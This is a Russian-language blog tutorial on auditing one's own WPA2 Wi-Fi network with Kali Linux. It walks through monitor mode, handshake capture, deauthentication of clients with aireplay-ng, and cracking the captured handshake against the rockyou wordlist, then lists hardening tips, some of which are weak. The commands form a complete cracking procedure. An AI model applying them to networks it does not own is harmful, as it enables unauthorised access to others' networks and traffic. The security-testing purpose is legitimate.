Хотели бы узнать можно ли взломать вашу Wi-Fi сеть? А также узнать, как ее защитить чтобы ни кто не взломал? Тогда сайт Android +1 подробно расскажет и покажет, как это сделать.
Почему важно защищать
личную Wi-Fi сеть?
Если вам «пофиг» на то, открытая Wi-Fi сеть или закрытая, сильный пароль используется или нет, рассуждаете «ну взломают, и что с того», то вы глубоко ошибаетесь и вот почему.
Говорить про то, что кто-то будет пользоваться вашим интернетом, вам, и так понятно, из-за этого может упасть довольно сильно скорость передачи данных, но это только цветочки. У хакера взломавшего вашу Wi-Fi сеть появится доступ к вашим личным файлам, если вы что-либо покупаете в интернете, то ваши сбережения могут быть в опасности. Но и это были мелочи, самое страшное то, что взломав вашу сеть, могут осуществляться противоправные действия и в случае чего к вам могут приехать «люди в масках» и придется доказывать свою невиновность.
Поэтому важно защищать свою Wi-Fi сеть от взлома! Как? Ну для начала мы расскажем, как провести аудит беспроводной сети на предмет возможности взлома, а после дадим вам дельные советы!
Читайте также:
Проверка на взлом Wi-Fi сети
Взлом чужих сетей является противозаконным! Данные действия проводить, только в личной беспроводной сети!
Еще раз, все действия которые далее будут описаны, только для проверки вашей беспроводной сети Wi-Fi на возможность взлома! Не стоит использовать, запрещено пользоваться данным мануалом в противоправных действиях!
Что необходимо?
- Современный компьютер или ноутбук с Wi-Fi адаптером
- Скачать Дистрибутив Kali Linux
- Флешка на 8GB
После того как Kali Linux будет загружен, создайте загрузочную флешку Linux. После чего установите дистрибутив на компьютер или запустите в режиме Live Boot.
Проверка Wi-Fi сети на возможность взлома
Откройте терминал в Kali Linux
и создайте рабочее пространство и перейдите в него:
mkdir wifi cd wifi
Далее, перемещаем файл с базой паролей в нашу рабочую папку wifi, для этого узнаем где он лежит:
locate rockyou.txt
ниже будет указан путь, на момент написания это:
/usr/share/wordlists/rockyou.txt.gz
Копируем данный файл в папку wifi:
cp /usr/share/wordlists/rockyou.txt.gz ~/wifi/
и распакуем архив:
gunzip rockyou.txt.gz
Отлично! Теперь приступаем к проверке сети!
Завершим ненужные процессы:
airmon-ng check kill
Теперь необходимо узнать интерфейс адаптера Wi-Fi, вводим команду:
airmon-ng
В колонке Interface будет необходимое название, в большинстве случаев это wlan0.
Переводим адаптер WiFi в режим сканирования:
airmon-ng start wlan0
Вводим еще раз команду airmon-ng чтобы узнать новое имя интерфейса Wi-Fi адаптера, в большинстве случаев это wlan0mon.
Выполняем сканирование на наличие беспроводных сетей:
airodump-ng wlan0mon
Найдите свою сеть из полученного списка и скопируйте значения BSSID и CH. Чтобы остановить сканирование нажмите комбинацию клавиш Ctrl C.
Теперь начинаем сканировать свою сеть, для того чтобы получить необходимые данные:
airodump-ng -c номер_канала --bssid сеть_wifi -w ~/wifi/ wlan0mon
Сканирование может занять продолжительное время, чтобы ускорить процесс подключите к сети как можно больше устройств.
Чтобы ускорить процесс можете сделать вот что, откройте еще одно терминала и введите команду:
aireplay-ng -0 10 -a сеть_wifi -с подключенный_клиент_сети wlan0mon
когда в окне терминала вверху появится слово handshake, значит все готово и данные полученны.
Чтобы остановить сканирование нажмите комбинацию клавиш Ctrl C.
Теперь смотрим если в базе пароль от Wi-Fi сети:
aircrack-ng -a2 -b сеть_wifi -w ~/wifi/rockyou.txt ~/wifi/*.cap
После чего начнется поиск пароля в базе данных, данный процесс может занять длительное время. Если пароль есть в базе данных, то он будет указан в терминале,
если нет, то вам повезло и ваша Wi-Fi сеть защищена! Но защиту можно увеличить еще!
Как защитить Wi-Fi сеть от взлома?
- Выключите отображение SSID, вследствие чего ваша сеть исчезнет из списка доступных и, чтобы подключить новое устройство вам придется вводить название точки доступа вручную
- Используйте защиту WPA2, тип шифрования AES
- Используйте длинный и сложный пароль из 8 — 15, цифры и буквы (заглавные и строчные), а также символы @$%&*_
- Меняйте пароли раз 2-3 месяца
- Создайте отдельную Wi-Fi сеть для гостей (если позволяет роутер)
- Привяжите свои устройства по Mac к вашему роутеру, после чего разрешить доступ только выбранным устройствам
- Если нет необходимости в «дальнобойности» Wi-Fi сети, то уменьшите ее покрытие, за счет уменьшения силы излучения
- Отключайте Wi-Fi если в нем нет необходимости
У вас еще остались вопросы? Пишите их в комментариях, рассказывайте, что у вас получилось или наоборот!
Вот и все! Больше полезных статей и инструкций читайте в разделе Статьи и Хаки Linux. Оставайтесь вместе с сайтом Android +1, дальше будет еще интересней!
